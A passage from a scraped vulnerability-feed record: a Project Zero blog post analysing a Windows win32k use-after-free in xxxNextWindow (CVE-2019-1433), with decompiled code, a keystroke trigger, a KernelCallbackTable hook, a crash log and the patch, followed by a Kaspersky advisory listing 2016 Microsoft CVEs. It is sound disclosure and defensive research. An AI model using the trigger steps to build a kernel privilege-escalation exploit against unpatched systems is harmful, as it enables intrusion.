As a side note, for the reversing, I found that the Hex-Rays decompiler was great for general triage and understanding large blocks of code, but for the detailed understanding necessary (at least for me) for writing a proof-of-concept (POC), I mainly used the disassembly view.\n\n## RESOURCES\n\nHere are some of the resources that were critical for me:\n\n * \u201cKernel Attacks Through User-Mode Callbacks\u201d Blackhat USA 2011 talk by Tarjei Mandt [[slides](<http://mista.nu/research/mandt-win32k-slides.pdf>), video]\n\n   * I learned about thread locking, assignment locking, and user-mode callbacks.\n\n * \u201cOne Bit To Rule A System: Analyzing CVE-2016-7255 Exploit In The Wild\u201d by Jack Tang, Trend Micro Security Intelligence [[blog](<https://blog.trendmicro.com/trendlabs-security-intelligence/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild/>)]\n\n   * This was an analysis of a vulnerability also related to xxxNextWindow. This blog helped me ultimately figure out how to trigger xxxNextWindow and some argument types of other functions.\n\n * \u201cKernel exploitation \u2013 r0 to r3 transitions via KeUserModeCallback\u201d by Mateusz Jurczyk [[blog](<https://j00ru.vexillium.org/2010/09/kernel-exploitation-r0-to-r3-transitions-via-keusermodecallback/>)]\n\n   * This blog helped me figure out how to modify the dispatch table pointer with my own function so that I could execute during the user-mode callback.\n\n * \u201cWindows Kernel Reference Count Vulnerabilities - Case Study\u201d by Mateusz Jurczyk, Zero Nights 2012 [[slides](<https://j00ru.vexillium.org/slides/2012/zeronights.pdf>)]\n\n * \u201cAnalyzing local privilege escalations in win32k\u201d by mxatone, Uninformed v10 (10/2008) [[article](<http://uninformed.org/?v=10&a=2>)]\n\n * P0 Team Members: James Forshaw, Tavis Ormandy, Mateusz Jurczyk, and Ben Hawkes\n\n# TIMELINE\n\n * Oct 31 2019: Chrome releases fix for CVE-2019-13720\n\n * Dec 10 2019: Microsoft Security Bulletin lists CVE-2019-1458 
as exploited in the wild and fixed in the December updates.\n\n * Dec 10-16 2019: I ask around for a copy of the exploit. No luck!\n\n * Dec 16 2019: I begin setting up a Windows 7 kernel debugging environment. (And 2 days work on a different project.)\n\n * Dec 23 2019: VM is set up. Start patch diffing\n\n * Dec 24-Jan 2: Holiday\n\n * Jan 2 - Jan 3: Look at other diffs that weren\u2019t the vulnerability. Try to trigger DrawSwitchWndHilite\n\n * Jan 6: Realize the changes to xxxKeyEvent and xxxNextWindow are the correct change. (Note dear reader, this is not in fact the \u201ccorrect change\u201d.)\n\n * Jan 6-Jan 16: Figure out how the vulnerability works, go down random rabbit holes, work on POC.\n\n * Jan 16: Crash POC crashes!\n\nApproximately 3 work weeks to set up a test environment, diff patches, and create a crash POC.\n\n# ~~CVE-2019-1458~~ CVE-2019-1433 ROOT CAUSE ANALYSIS\n\nBug class: use-after-free\n\n## OVERVIEW\n\nThe vulnerability is a use-after-free of a tagQ object in xxxNextWindow, freed during a user-mode callback. (The xxx prefix on xxxNextWindow means that there is a callback to user mode.) The function xxxKeyEvent is the only function that calls xxxNextWindow and it calls xxxNextWindow with a pointer to a tagQ object as the first argument. Neither xxxKeyEvent nor xxxNextWindow locks the object to prevent it from being freed during any of the user-mode callbacks in xxxNextWindow. After one of these user-mode callbacks (xxxMoveSwitchWndHilite), xxxNextWindow then uses the pointer to the tagQ object without any verification, causing a use-after-free.\n\n## DETAILED WALK THROUGH\n\nThis section will walk through the vulnerability on Windows 7. I analyzed the Windows 7 patches instead of Windows 10 as explained above in the process section. 
The Windows 7 crash POC that I developed is available [here](<https://drive.google.com/file/d/1V9HHljjRq17hnfqasExnCiGCJLkt0aOX/view>).\n\n### ANALYZED SAMPLES\n\nI did the diff and analysis between the September and December 2019 updates of win32k.sys as explained in the \u201cMy Process\u201d section.\n\n** \n**\n\nVulnerable win32k.sys (Sept 2019): 9dafa6efd8c2cfd09b22b5ba2f620fe87e491a698df51dbb18c1343eaac73bcf (SHA-256)\n\nPatched win32k.sys (December 2019): b22186945a89967b3c9f1000ac16a472a2f902b84154f4c5028a208c9ef6e102 (SHA-256)\n\n** \n**\n\n### OVERVIEW\n\nThis walk through is broken up into the following sections to describe the vulnerability:\n\n * Triggering xxxNextWindow\n\n * Freeing the tagQ (queue) structure\n\n * User-mode callback xxxMoveSwitchWndHilite\n\n * Using the freed queue\n\n### TRIGGERING xxxNextWindow\n\nThe code path is triggered by a special set of keyboard inputs to open a \u201cSticky Task Switcher\u201d window. As a side note, I didn\u2019t find a way to manually trigger the code path, only programmatically (not that an individual writing an EoP would need it to be triggered manually). To trigger xxxNextWindow, my proof-of-concept (POC) sends the following keystrokes using the SendInput API: \n\n\n<ALT (Extended)> \\+ TAB + TAB release + ALT + CTRL + TAB + release all except ALT extended + TAB. (See triggerNextWindow function in POC). \n\n** \n**\n\nThe \u201cnormal\u201d way to trigger the task switch window is with ALT + TAB, or ALT+CTRL+TAB for \u201csticky\u201d. However, this window won\u2019t hit the vulnerable code path, xxxNextWindow. The \u201cnormal\u201d task switching window, shown below, looks different from the task switching window displayed when the vulnerable code path is being executed. Shown below is the \u201cnormal\u201d task switch window that is displayed when ALT+TAB [+CTRL] are pressed and xxxNextWindow is NOT triggered. The window that is shown when xxxNextWindow is triggered is shown below that. 
\n \n \n\n\n[](<https://1.bp.blogspot.com/-o4XFRI3CfJE/Xpto6UevWII/AAAAAAAAPh0/HCRz20rFYRgjy6QGC9m1uvKdadZU-uh5ACNcBGAsYHQ/s1600/6_NormalTaskSwitcher%2B%25281%2529.png>)\n\n \n\n\n \n \n\n\n\"Normal\" task switch window\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-RJX4C9GRLdU/Xpto6mHp-YI/AAAAAAAAPh4/yWKpyz52hY0VX6rL7NgS8gvZR2H9mr1vgCNcBGAsYHQ/s1600/7_NextWindowTaskSwitcher%2B%25281%2529.png>)\n\n \n\n\n \n\n\nWindow that is displayed when xxxNextWindow is called\n\n \nIf this is the first \u201ctab press\u201d then the task switch window needs to be drawn on the screen. This code path through xxxNextWindow is not the vulnerable one. The next time you hit TAB, after the window has already been drawn on the screen, when the rectangle should move to the next window, is when the vulnerable code in xxxNextWindow can be reached. \n\n** \n**\n\n### FREEING THE QUEUE in xxxNextWindow\n\nxxxNextWindow takes a pointer to a queue (tagQ struct) as its first argument. This tagQ structure is the object that we will use after it is freed. We will free the queue in a user-mode callback from the function. \n\n** \n**\n\nAt LABEL_106 below (xxxNextWindow+0x847), the queue is used without verifying whether or not it still exists. The only way to reach LABEL_106 in xxxNextWindow is from the branch at xxxNextWindow+0x842. This means that our only option for a user-callback mode is in the function xxxMoveSwitchWndHilite. xxxMoveSwitchWndHilite is responsible for moving the little box within the task switch window that highlights the next window. 
\n\n```c\nvoid __fastcall xxxNextWindow(tagQ *queue, int a2) {\n[...]\n\n    v43 = 0;\n    while ( 1 ) {\n        if ( (gspwndAltTab->fnid & 0x3FFF) == 0x2A0 &&\n             gspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] &&\n             gspwndAltTab->bDestroyed == 0 )\n            v45 = *(switchWndStruct **)(gspwndAltTab + 0x128);\n        else\n            v45 = 0i64;\n        if ( !v45 ) {\n            ThreadUnlock1();\n            goto LABEL_106;\n        }\n        handleOfNextWindowToHilite = xxxMoveSwitchWndHilite(v8, v45, isShiftPressed2);  // \u2190 USER MODE CALLBACK\n        if ( v43 ) {\n            if ( v43 == handleOfNextWindowToHilite ) {\n                v48 = 0i64;\nLABEL_103:\n                ThreadUnlock1();\n                HMAssignmentLock(&gspwndActivate, v48);\n                if ( !*(_QWORD *)&gspwndActivate )\n                    xxxCancelCoolSwitch();\n                return;\n            }\n        } else {\n            v43 = handleOfNextWindowToHilite;\n        }\n        tagWndPtrOfNextWindow = HMValidateHandleNoSecure(handleOfNextWindowToHilite, TYPE_WINDOW);\n        if ( tagWndPtrOfNextWindow )\n            goto LABEL_103;\n        isShiftPressed2 = isShiftPressed;\n    }\n\n[...]\n\nLABEL_106:\n    v11 = queue->spwndActive;  // \u2190 USE AFTER FREE\n    if ( v11 || (v11 = queue->ptiKeyboard->rpdesk->pDeskInfo->spwnd->spwndChild) != 0i64 ) {\n\n[...]\n```\n\n### USER-MODE CALLBACK in xxxMoveSwitchWndHilite\n\nThere are quite a few different user-mode callbacks within xxxMoveSwitchWndHilite. Many of these could work, but the difficulty is picking one that will reliably return to our POC code. I chose the call to xxxSendMessageTimeout in DrawSwitchWndHilite.\n\nThis call is sending the message to the window that is being highlighted in the task switch window by xxxMoveSwitchWndHilite. Therefore, if we create windows in our POC, we can ensure that our POC will receive this callback.\n\nxxxMoveSwitchWndHilite sends message 0x8C which is WM_LPKDRAWSWITCHWND. This is an undocumented message and thus it\u2019s not expected that user applications will respond to this message. 
Instead, there is a user-mode function that is automatically dispatched by ntdll!KiUserCallbackDispatcher. The user-mode callback for this message is user32!_fnINLPKDRAWSWITCHWND. In order to execute code during this callback, in the POC we hot-patch the PEB.KernelCallbackTable, using the methodology documented [here](<https://j00ru.vexillium.org/2010/09/kernel-exploitation-r0-to-r3-transitions-via-keusermodecallback/>). \n\n** \n**\n\nIn the callback, we free the tagQ structure using [AttachThreadInput](<https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-attachthreadinput>). AttachThreadInput \u201cattaches the input processing mechanism of one thread to that of another thread\u201d and to do this, it destroys the queue of the thread that is being attached to another thread\u2019s input. The two threads then share a single queue. In the callback, we also have to perform the following operations to force execution down the code path that will use the now freed queue:\n\n 1. xxxMoveSwitchWndHilite returns the handle of the next window it should highlight. When this handle is passed to HMValidateHandleNoSecure, it needs to return 0. Therefore, in the callback we need to destroy the window that is going to be highlighted. When HMValidateHandleNoSecure returns 0, we\u2019ll loop back to the top of the while loop.\n\n 2. Once we\u2019re back at the top of the while loop, in the following code block we need to set v45 to 0. There appear to be two options: fail the check such that you go in the else block or set the extra data in the tagWND struct to 0 using SetWindowLongPtr. The SetWindowLongPtr method doesn\u2019t work because this window is a special system class (fnid == 0x2A0). 
Therefore, we must fail one of the checks and end up in the else block in order to be in the code path that will allow us to use the freed queue.\n\n```c\nif ( (gspwndAltTab->fnid & 0x3FFF) == 0x2A0 &&\n     gspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] &&\n     gspwndAltTab->bDestroyed == 0 )\n    v45 = *(switchWndStruct **)(gspwndAltTab + 0x128);\nelse\n    v45 = 0i64;\n```\n\n### USING THE FREED QUEUE\n\nOnce v45 is set to 0, the thread is unlocked and execution proceeds to LABEL_106 (xxxNextWindow + 0x847) where mov r14, [rbp+50h] is executed. rbp is the tagQ pointer, so we dereference it and move the result into r14. Therefore we now have a use-after-free.\n\n## WINDOWS 10\n\nCVE-2019-1433 also affected Windows 10 builds. I did not analyze any Windows 10 builds besides 1903.\n\nVulnerable (Oct 2019) win32kfull.sys: c2e7f733e69271019c9e6e02fdb2741c7be79636b92032cc452985cd369c5a2c (SHA-256)\n\nPatched (Nov 2019) win32kfull.sys: 15c64411d506707d749aa870a8b845d9f833c5331dfad304da8828a827152a92 (SHA-256)\n\nI confirmed that the vulnerability existed on Windows 10 1903 as of the Oct 2019 patch by triggering the use-after-free with Driver Verifier enabled on win32kfull.sys. Below are excerpts from the crash.\n\n```\n*******************************************************************************\n*                                                                             *\n*                        Bugcheck Analysis                                    *\n*                                                                             *\n*******************************************************************************\n\nPAGE_FAULT_IN_NONPAGED_AREA (50)\nInvalid system memory was referenced. This cannot be protected by try-except.\nTypically the address is just plain bad or it is pointing at freed memory.\n\nFAULTING_IP:\nwin32kfull!xxxNextWindow+743\nffff89ba`965f553b 4d8bbd80000000  mov     r15,qword ptr [r13+80h]\n\n # Child-SP          RetAddr           Call Site\n00 ffffa003`81fe5f28 fffff806`800aa422 nt!DbgBreakPointWithStatus\n01 ffffa003`81fe5f30 fffff806`800a9b12 nt!KiBugCheckDebugBreak+0x12\n02 ffffa003`81fe5f90 fffff806`7ffc2327 nt!KeBugCheck2+0x952\n03 ffffa003`81fe6690 fffff806`7ffe4663 nt!KeBugCheckEx+0x107\n04 ffffa003`81fe66d0 fffff806`7fe73edf nt!MiSystemFault+0x1d6933\n05 ffffa003`81fe67d0 fffff806`7ffd0320 nt!MmAccessFault+0x34f\n06 ffffa003`81fe6970 ffff89ba`965f553b nt!KiPageFault+0x360\n07 ffffa003`81fe6b00 ffff89ba`965aeb35 win32kfull!xxxNextWindow+0x743   \u2190 UAF\n08 ffffa003`81fe6d30 ffff89ba`96b9939f win32kfull!EditionHandleAndPostKeyEvent+0xab005\n09 ffffa003`81fe6e10 ffff89ba`96b98c35 win32kbase!ApiSetEditionHandleAndPostKeyEvent+0x15b\n0a ffffa003`81fe6ec0 ffff89ba`96baada5 win32kbase!xxxUpdateGlobalsAndSendKeyEvent+0x2d5\n0b ffffa003`81fe7000 ffff89ba`96baa7fb win32kbase!xxxKeyEventEx+0x3a5\n0c ffffa003`81fe71d0 ffff89ba`964e3f44 win32kbase!xxxProcessKeyEvent+0x1ab\n0d ffffa003`81fe7250 ffff89ba`964e339b win32kfull!xxxInternalKeyEventDirect+0x1e4\n0e ffffa003`81fe7320 ffff89ba`964e2ccd win32kfull!xxxSendInput+0xc3\n0f ffffa003`81fe7390 fffff806`7ffd3b15 win32kfull!NtUserSendInput+0x16d\n10 ffffa003`81fe7440 00007ffb`7d0b2084 nt!KiSystemServiceCopyEnd+0x25\n11 0000002b`2a5ffba8 00007ff6`a4da1335 win32u!NtUserSendInput+0x14\n12 0000002b`2a5ffbb0 00007ffb`7f487bd4 WizardOpium+0x1335   <- My POC\n13 0000002b`2a5ffc10 00007ffb`7f86ced1 KERNEL32!BaseThreadInitThunk+0x14\n14 0000002b`2a5ffc40 00000000`00000000 ntdll!RtlUserThreadStart+0x21\n\nBUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202\n```\n\nTo trigger the crash, I only had to change two things in 
the Windows 7 POC:\n\n 1. The keystrokes are different to trigger the xxxNextWindow task switch window on Windows 10. I was able to trigger it by smashing CTRL+ALT+TAB while the POC was running (and triggering the normal task switch window). It is possible to do this programmatically; I just didn\u2019t take the time to code it up.\n\n 2. Overwrite index 0x61 instead of 0x57 in the KernelCallbackTable.\n\nIt took me about 3 hours to get the POC to trigger Driver Verifier on Windows 10 1903 regularly (about every 3rd time it's run). \n\n[Side-by-side disassembly of xxxNextWindow, Oct 2019 vs Nov 2019](<https://1.bp.blogspot.com/-DD9YxDSuvMo/Xpto6z2kcgI/AAAAAAAAPh8/Fl0ZjWF3vP4BGzmFhGrFkWBk_QKLfAhZwCNcBGAsYHQ/s1600/8_SidebySideDisasm2%2B%25281%2529.png>) \n \n--- \n \nDisassembly at xxxNextWindow+737 in Oct 2019 Update | Disassembly at xxxNextWindow+73F in Nov 2019 Update \n \nThe fix in the November update for Windows 10 1903 is the same as the Windows 7 fix: \n\n * Add the UnlockQueue function.\n\n * Add locking around the call to xxxNextWindow.\n\n * Check the \u201cdestroyed\u201d bitflag in the tagQ struct before proceeding to use the queue. \n\n# FIXING THE VULNERABILITY\n\nTo patch the CVE-2019-1433 vulnerability, Microsoft changed four functions: \n\n * xxxNextWindow\n\n * xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10)\n\n * zzzDestroyQueue\n\n * UnlockQueue (new function)\n\nOverall, the changes prevent the queue structure from being freed while it is still in use and track whether something attempted to destroy the queue in the meantime. The addition of the new function, UnlockQueue, suggests that there were no previous locking mechanisms for queue objects. \n\n## zzzDestroyQueue Patch\n\nThe only change to the zzzDestroyQueue function in win32k is that if the refcount on the tagQ structure (tagQ.cLockCount) is greater than 0 (keeping the queue from being freed immediately), then the function now sets a bit in tagQ.QF_flags. 
\n\n[BinDiff of zzzDestroyQueue, pre-patch](<https://1.bp.blogspot.com/-AfAFuVQf9ik/Xpto7GVoiTI/AAAAAAAAPiA/gHmTpfZvZRYzVnJsQgfaYrzLKBPHbSuZQCNcBGAsYHQ/s1600/9_DestroyQueueBindiff%2B%25281%2529.png>)\n\nzzzDestroyQueue Pre-Patch\n\n[BinDiff of zzzDestroyQueue, post-patch](<https://1.bp.blogspot.com/-fqYi_u0Zxw8/Xpto7V4HOoI/AAAAAAAAPiE/Hu_tMFWdhnAMbn0CaOd4K_579uEBwQJMgCNcBGAsYHQ/s1600/A_DestroyQueueBindiff%25232%2B%25281%2529.png>)\n\nzzzDestroyQueue Post-Patch\n\n## xxxNextWindow Patch\n\nThere is a single change to the xxxNextWindow function, as shown by the BinDiff graph below. When execution is about to use the queue again (at what was LABEL_106 in the vulnerable version), a check has been added to see if a bitflag in tagQ.QF_flags is set. The instructions added at xxxNextWindow+0x847 are as follows, where rbp is the pointer to the tagQ structure.\n\nbt dword ptr [rbp+13Ch], 1Ah\njb loc_FFFFF9600017A0C9 \n \n--- \n \nIf the bit is set, the function exits. If the bit is not set, the function continues and will use the queue. The only place this bit is set is in zzzDestroyQueue. The bit is set when the queue was destroyed but couldn't be freed immediately because its refcount (tagQ.cLockCount) is greater than 0. Setting the bit is a new change to the code base, as described in the section above. \n\n[BinDiff graph of the xxxNextWindow changes](<https://1.bp.blogspot.com/-BGo0hE2WvZE/Xpto7nBs7XI/AAAAAAAAPiI/hWcK8Db2YZ8yAtB4EOL_R0cHJtxfD-wEACNcBGAsYHQ/s1600/B_xxxNextWindowChanges%2B%25281%2529.png>)\n\n## xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10) Patch\n\nIn this section I will simply refer to the function as xxxKeyEvent since Windows 7 was the main platform analyzed. However, the changes are also found in the EditionHandleAndPostKeyEvent function in Windows 10. \n\nThe change to xxxKeyEvent is to thread lock the queue that is passed as the first argument to xxxNextWindow. Thread locking doesn\u2019t appear to be publicly documented by Microsoft. 
My understanding comes from Tarjei Mandt\u2019s 2011 Blackhat USA presentation, \u201c[Kernel Attacks through User-Mode Callbacks](<https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf>)\u201d. Thread locking is where objects are added to a thread\u2019s lock list, and their ref counter is increased in the process. This prevents them from being freed while they are still locked to the thread. \n\nThe new function, UnlockQueue, is used to unlock the queue. \n\nif ( !queue )\nqueue = gptiRit->pq;\nxxxNextWindow(queue, vkey_cp); \n \n--- \n \nxxxKeyEvent+92E Pre-Patch\n\nif ( !queue )\nqueue = gptiRit->pq;\n++queue->cLockCount;\ncurrWin32Thread = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v62);\nthreadLockW32 = currWin32Thread->ptlW32;\ncurrWin32Thread->ptlW32 = (_TL *)&threadLockW32;\nqueueCp = queue;\nunlockQueueFnPtr = (void (__fastcall *)(tagQ *))UnlockQueue;\nxxxNextWindow(queue, vkey_cp);\ncurrWin32Thread2 = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v64);\ncurrWin32Thread2->ptlW32 = threadLockW32;\nunlockQueueFnPtr(queueCp); \n \n--- \n \nxxxKeyEvent+94E Post-Patch\n\n# CONCLUSION\n\nSo...I got it wrong. Based on the details provided by Kaspersky in their blog post, I attempted to patch-diff the vulnerability in order to do a root cause analysis. It was only based on the feedback from Microsoft (Thanks, Microsoft!) and their guidance to look at the InitFunctionTables method that I realized I had analyzed a different bug. I analyzed CVE-2019-1433 rather than CVE-2019-1458, the vulnerability exploited in the wild. The real root cause analysis for CVE-2019-1458 was documented by @florek_pl [here](<https://github.com/piotrflorczyk/cve-2019-1458_POC>).\n\nIf I had patch-diffed November 2019 to December 2019 rather than September to December, then I wouldn\u2019t have analyzed the wrong bug. 
This seems obvious after the fact, but when just starting out, I thought that maybe Windows 7, being so close to end of life, didn\u2019t get updates every single month. Now I know to not only rely on Windows Update, but also to look for KB articles, and that I can download additional updates from the Microsoft Update Catalog.\n\nAlthough this blog post didn\u2019t turn out how I originally planned, I decided to share it in the hopes that it\u2019d encourage others to explore a platform new to them. It\u2019s often not a straight path, but if you\u2019re interested in Windows kernel research, this is how I got started. In addition, I think this was a fun and quite interesting bug!\n\nI didn\u2019t initially set out to do a patch-diffing exercise on this vulnerability, but I do think that this work gives us another data point to use in disclosure discussions. It took me, someone with reversing experience but no Windows experience, three weeks to understand the vulnerability and write a proof-of-concept. While I ended up doing this analysis for a vulnerability other than the one I intended, many attackers are not looking to patch-diff a specific vulnerability, but rather any vulnerability that they could potentially exploit. 
Therefore, I think that three weeks can be used as an approximate high upper bound since most attackers looking to use this technique will have more experience.\n\n \n\n", "modified": "2020-04-02T00:00:00", "published": "2020-04-02T00:00:00", "id": "GOOGLEPROJECTZERO:C2A64C2133DFD2ACB457C2DD2790CBF7", "href": "https://googleprojectzero.blogspot.com/2020/04/tfw-you-get-really-excited-you-patch.html", "type": "googleprojectzero", "title": "\nTFW you-get-really-excited-you-patch-diffed-a-0day-used-in-the-wild-but-then-find-out-it-is-the-wrong-vuln\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:48:11", "bulletinFamily": "info", "cvelist": ["CVE-2016-7221", "CVE-2016-7239", "CVE-2016-7195", "CVE-2016-7184", "CVE-2016-3338", "CVE-2016-3334", "CVE-2016-7216", "CVE-2016-7227", "CVE-2016-7237", "CVE-2016-7246", "CVE-2016-7248", "CVE-2016-7199", "CVE-2016-3335", "CVE-2016-7218", "CVE-2016-7210", "CVE-2016-7214", "CVE-2016-3343", "CVE-2016-3333", "CVE-2016-7202", "CVE-2016-0026", "CVE-2016-7198", "CVE-2016-7205", "CVE-2016-7256", "CVE-2016-7238", "CVE-2016-3332", "CVE-2016-7255", "CVE-2016-3342", "CVE-2016-7215", "CVE-2016-7212", "CVE-2016-3340"], "description": "### *Detect date*:\n11/08/2016\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). 
Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information, execute arbitrary code, or cause denial of service.\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:\n\n### *Affected products*:\nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows Vista Service Pack 2 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2012 \nWindows RT 8.1 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 for 32-bit Systems \nInternet Explorer 9 \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 \nMicrosoft Windows Hyperlink Object Library \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2012 R2 \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nInternet Explorer 10 \nInternet Explorer 11 \nWindows Vista x64 Edition Service Pack 2 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nMicrosoft Edge (EdgeHTML-based)\n\n### *Solution*:\nInstall the necessary updates from the KB section that are listed in your Windows Update (Windows Update can usually be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2016-7216](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7216>) 
\n[CVE-2016-7214](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7214>) \n[CVE-2016-7215](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7215>) \n[CVE-2016-7212](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7212>) \n[CVE-2016-7210](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7210>) \n[CVE-2016-7218](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7218>) \n[CVE-2016-3340](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3340>) \n[CVE-2016-3342](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3342>) \n[CVE-2016-3343](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3343>) \n[CVE-2016-7195](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7195>) \n[CVE-2016-7248](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7248>) \n[CVE-2016-7199](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7199>) \n[CVE-2016-7198](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7198>) \n[CVE-2016-7246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7246>) \n[CVE-2016-7205](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7205>) \n[CVE-2016-7221](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7221>) \n[CVE-2016-7227](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7227>) \n[CVE-2016-7202](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7202>) \n[CVE-2016-3333](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3333>) \n[CVE-2016-3332](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3332>) 
\n[CVE-2016-3335](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3335>) \n[CVE-2016-3334](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3334>) \n[CVE-2016-3338](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-3338>) \n[CVE-2016-0026](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-0026>) \n[CVE-2016-7184](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7184>) \n[CVE-2016-7238](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7238>) \n[CVE-2016-7239](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7239>) \n[CVE-2016-7237](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7237>) \n[CVE-2016-7256](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7256>) \n[CVE-2016-7255](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2016-7255>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2016-7239](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7239>)0.0Unknown \n[CVE-2016-7227](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7227>)0.0Unknown \n[CVE-2016-7195](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7195>)0.0Unknown \n[CVE-2016-7198](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7198>)0.0Unknown \n[CVE-2016-7199](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7199>)0.0Unknown \n[CVE-2016-7202](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7202>)0.0Unknown \n[CVE-2016-7256](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7256>)0.0Unknown \n[CVE-2016-7255](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255>)0.0Unknown 
\n[CVE-2016-7248](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7248>)0.0Unknown \n[CVE-2016-7246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7246>)0.0Unknown \n[CVE-2016-7238](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7238>)0.0Unknown \n[CVE-2016-7237](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7237>)0.0Unknown \n[CVE-2016-0026](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0026>)0.0Unknown \n[CVE-2016-3332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3332>)0.0Unknown \n[CVE-2016-3333](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3333>)0.0Unknown \n[CVE-2016-3334](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3334>)0.0Unknown \n[CVE-2016-3335](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3335>)0.0Unknown \n[CVE-2016-3338](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3338>)0.0Unknown \n[CVE-2016-3340](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3340>)0.0Unknown \n[CVE-2016-3342](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3342>)0.0Unknown \n[CVE-2016-3343](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3343>)0.0Unknown \n[CVE-2016-7184](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7184>)0.0Unknown 